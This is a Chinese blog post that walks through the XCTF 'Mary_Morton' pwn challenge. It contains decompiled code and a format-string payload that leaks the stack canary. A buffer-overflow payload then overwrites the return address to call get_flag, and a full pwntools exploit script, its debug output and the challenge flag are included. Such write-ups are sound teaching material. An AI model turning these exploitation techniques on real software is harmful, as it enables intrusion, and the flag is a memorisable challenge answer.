Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17

最新推荐文章于 2022-12-19 22:12:33 发布
原创 最新推荐文章于 2022-12-19 22:12:33 发布 · 1.7k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#攻防世界 #xctf #ctf #pwn

本文详细解析了一个名为Mary_Morton的PWN题目,通过格式化字符串漏洞获取Canary值,再利用read溢出漏洞覆盖Canary值和EIP值,最终成功调用get_flag函数拿到flag。

题目地址:Mary_Morton

已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒!

先看看题目内容

很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈

大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下

惯例先来检查安全机制

root@mypwn:/ctf/work/python/mary_morton# checksec 4a6845da698e4ea2b922a0fef483bfda 
[*] '/ctf/work/python/mary_morton/4a6845da698e4ea2b922a0fef483bfda'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了Canary,上个题目直接用数组下标任意填写,来绕过来Canary,看看这题我们要遇见什么呢!

先打开IDA看看题目情况

 这个题目内容确实不复杂,说是热身题也没错,我简单做了一下变量和函数重命名,给大家贴出来c语言代码:

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  int nChoice; // [rsp+24h] [rbp-Ch]
  unsigned __int64 v4; // [rsp+28h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  init_env();
  puts("Welcome to the battle ! ");
  puts("[Great Fairy] level pwned ");
  puts("Select your weapon ");
  while ( 1 )
  {
    while ( 1 )
    {
      menu_string();
      __isoc99_scanf("%d", &nChoice);
      if ( nChoice != 2 )
        break;
      Menu2();
    }
    if ( nChoice == 3 )
    {
      puts("Bye ");
      exit(0);
    }
    if ( nChoice == 1 )
      Menu1();
    else
      puts("Wrong!");
  }
}

unsigned __int64 Menu1()
{
  char buf; // [rsp+0h] [rbp-90h]
  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&buf, 0, 0x80uLL);
  read(0, &buf, 0x100uLL);
  printf("-> %s\n", &buf);
  return __readfsqword(0x28u) ^ v2;
}

unsigned __int64 Menu2()
{
  char buf; // [rsp+0h] [rbp-90h]
  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&buf, 0, 0x80uLL);
  read(0, &buf, 0x7FuLL);
  printf(&buf, &buf);
  return __readfsqword(0x28u) ^ v2;
}

int get_flag()
{
  return system("/bin/cat ./flag");
}

一共四个函数:

  1. main是主函数
  2. Menu1函数存在read溢出漏洞
  3. Menu2函数存在格式化字符串漏洞
  4. get_flag函数提供给我们输出处flag

为什么要给我们提供两个漏洞,那就是因为存在Canary保护机制。

处理步骤如下:

  1. 通过格式化字符串漏洞获取Canary值
  2. 通过read溢出漏洞覆盖Canary值和EIP值,跳转到get_flag函数

首先确定一个格式化字符串漏洞的步长,构造payload如下:

payload = 'AAAA.1.%1$#x.2.%2$#x.3.%3$#x.4.%4$#x.5.%5$#x.6.%6$#x.7.%7$#x.8.%8$#x.'

编写一个函数,可以方便的执行payload ,脚本如下:

def fmt_str(payload, choice):
	p.sendlineafter('3. Exit the battle \n', str(choice))
	p.sendline(payload)
	info = p.recv().splitlines()[0]
	print "info:"+info
	return info

执行之后结果如下:

root@mypwn:/ctf/work/python/mary_morton# python mary_morton.py
[+] Opening connection to 111.198.29.45 on port 45464: Done
info:AAAA.1.0x2b7ea2f0.2.0x7f.3.0x2c1b4260.4.0.5.0.6.0x41414141.7.0x78232431.8.0x78232432.
AAAA.1.0x2b7ea2f0.2.0x7f.3.0x2c1b4260.4.0.5.0.6.0x41414141.7.0x78232431.8.0x78232432.
[*] Closed connection to 111.198.29.45 port 45464

注意到6.0x41414141,那么步长就是6。 

下面我们就先构造一下这两个步骤需要的payload

1、获取canary

step = 6
num = step+(0x90-8)/8
payload = '%'+str(num)+'$p'

2、read溢出到eip

get_flag_addr = 0x4008DA
payload = 'A'*(0x90-8) + p64(canary) + 'A'*8 + p64(get_flag_addr)

根据上面到payload编写python脚本如下:

#coding:utf8

from pwn import *
context.log_level = 'debug'
process_name = '4a6845da698e4ea2b922a0fef483bfda'

# p = process(process_name)
p = remote('111.198.29.45', 45464)

def fmt_str(payload, choice):
	p.sendlineafter('3. Exit the battle \n', str(choice))
	p.sendline(payload)
	info = p.recv().splitlines()[0]
	print "info:"+info
	return info

# payload = 'AAAA.1.%1$#x.2.%2$#x.3.%3$#x.4.%4$#x.5.%5$#x.6.%6$#x.7.%7$#x.8.%8$#x.'
# print fmt_str(payload, 2)

step = 6
num = step+(0x90-8)/8
payload = '%'+str(num)+'$p'
canary = int(fmt_str(payload, 2).split('x', 1)[1], 16)
log.info("canary => %#x", canary)

get_flag_addr = 0x4008DA
payload = 'A'*(0x90-8) + p64(canary) + 'A'*8 + p64(get_flag_addr)
fmt_str(payload, 1)

p.interactive()
root@mypwn:/ctf/work/python/mary_morton# python mary_morton.py
[+] Opening connection to 111.198.29.45 on port 45464: Done
[DEBUG] Received 0x18 bytes:
    'Welcome to the battle ! '
[DEBUG] Received 0x77 bytes:
    '\n'
    '[Great Fairy] level pwned \n'
    'Select your weapon \n'
    '1. Stack Bufferoverflow Bug \n'
    '2. Format String Bug \n'
    '3. Exit the battle \n'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Sent 0x6 bytes:
    '%23$p\n'
[DEBUG] Received 0x13 bytes:
    '0x32e0978333c6af00\n'
info:0x32e0978333c6af00
[*] canary => 0x32e0978333c6af00
[DEBUG] Received 0x47 bytes:
    '1. Stack Bufferoverflow Bug \n'
    '2. Format String Bug \n'
    '3. Exit the battle \n'
[DEBUG] Sent 0x2 bytes:
    '1\n'
[DEBUG] Sent 0xa1 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000080  41 41 41 41  41 41 41 41  00 af c6 33  83 97 e0 32  │AAAA│AAAA│···3│···2│
    00000090  41 41 41 41  41 41 41 41  da 08 40 00  00 00 00 00  │AAAA│AAAA│··@·│····│
    000000a0  0a                                                  │·│
    000000a1
[DEBUG] Received 0x8c bytes:
    '-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
info:-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[*] Switching to interactive mode
[DEBUG] Received 0x2d bytes:
    'cyberpeace{4ecf7db84b3599e2a5b396ce077e41e2}\n'
cyberpeace{4ecf7db84b3599e2a5b396ce077e41e2}
[*] Got EOF while reading in interactive
$

执行成功,直接拿到了flag。

 

 

 

 

 

攻防世界——进阶PWNMary_Morton
baidu_36110484的博客
06-14 489
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
攻防世界)(pwnmary_mroton
PLpa的博客
07-20 936
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
攻防世界 Mary_Morton
10-07 376
1.题目 2.IDA分析 3.流程分析
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2344
攻防世界pwnMary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
Mary_Morton(xctf)
weixin_43868725的博客
06-12 443
程序保护和流程 保护: 流程: main() 如果输入1会进入 这个函数有一个栈溢出漏洞。 如果输入2会进入 这个函数有一个格式化字符串漏洞。 还有一个cat_flag的函数 0x1 利用过程 首先这个程序开启了canary,所以直接栈溢出会报错。但是我们知道v2变量中存放的是canary值(v2在函数开始时就被**__readfsqword(0x28u)赋值,函数结束前与__readfsqword(0x28u)**进行比较),如果我们能通过格式化字符串漏洞将v2的值泄露出来就可以利用栈溢出漏洞
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 738
题目描述: ASIS-CTF-Finals-2017 非常简单热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
攻防世界pwn-Mary_Morton
qq_41168609的博客
01-04 362
题目 1、文件分析 64位的程序,并且开启了NX和Canary,还有Partial RELRO,got表有写权限 执行文件看流程 使用IDA进行分析,发现存在两处漏洞,字符串漏洞和栈溢出漏洞 通过搜索,存在后门函数 2、解题思路: 首先利用字符串漏洞,获取canary的值,绕过Canary保护 利用栈溢出漏洞,执行后门函数,获取到flag 3、获取canary值 计算偏移地址 canary的值就是var_8,我们需要获取var_8的值,栈溢出时保证该值不改变就可以绕过canary保护。 (1
4.pwn入门新手做攻防世界Mary_Morton (stack canary与绕过的思路)
qiudalaojiao的博客
02-14 689
canary 通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip 等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实 现。。这个概念应用在栈保护上则是在初始化一个栈帧时在栈底设置一个随机的canary值,栈帧销毁前 测试比较该值是否“死掉”,即是否被改变,若被改变则说明栈溢出发生,程序走另一个流程结束,以免漏洞利...
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 996
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲溢出漏洞)
Onlyone_1314的博客
09-09 1818
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 398
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
攻防世界Mary_Morton wp
苗_的博客
10-13 395
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 398
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
XCTF Mary_Morton
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 547
原题出现在ASIS-CTF-Finals-2017 程序存在两个漏洞,一个格式化字符串漏洞,一个栈溢出漏洞 通过格式化字符串漏洞泄露canary的值,然后再构造payload,利用栈溢出漏洞获取flag canary的值是v2,因此得到canary在栈中的位置为第17位(0x88 / 8=17),又因为程序为64位程序,64位程序函数调用前6个参数通过寄存器传递,所以要加6,因此格式化字符为%2...
mary_morton
pppp974的博客
07-22 1174
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
攻防世界高手进阶 ——Mary_Morton
weixin_62675330的博客
02-26 4196
攻防世界高手进阶 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
xctf高手进阶第二题 Mary_Morton
neuisf的博客
01-23 465
启动运行时输出提示有三个选项,分别是:1.缓冲溢出漏洞;2.格式化字符串漏洞;3.退出。 解题方法:因为缓冲溢出在main函数中,利用格式化字符串漏洞读取main函数的canary,利用缓冲溢出运行0x4008DA处的system (/bin/cat flag)指令。 exp: from pwn import * p=remote('111.198.29.45'...
攻防世界-Mary_Morton
Henlenl的博客
11-30 3124
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 278
做题记录
利用d3-morton-order实现空间填充曲线的D3可视化布局
资源摘要信息:"d3-morton-order" D3布局是一种基于JavaScript的数据可视化库,特别适用于使用d3.js技术栈的开发者。它实现了一种特别的数据布局方法,即通过连续的莫顿(Morton)或Z阶(Z-order)空间填充曲线来可视...
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值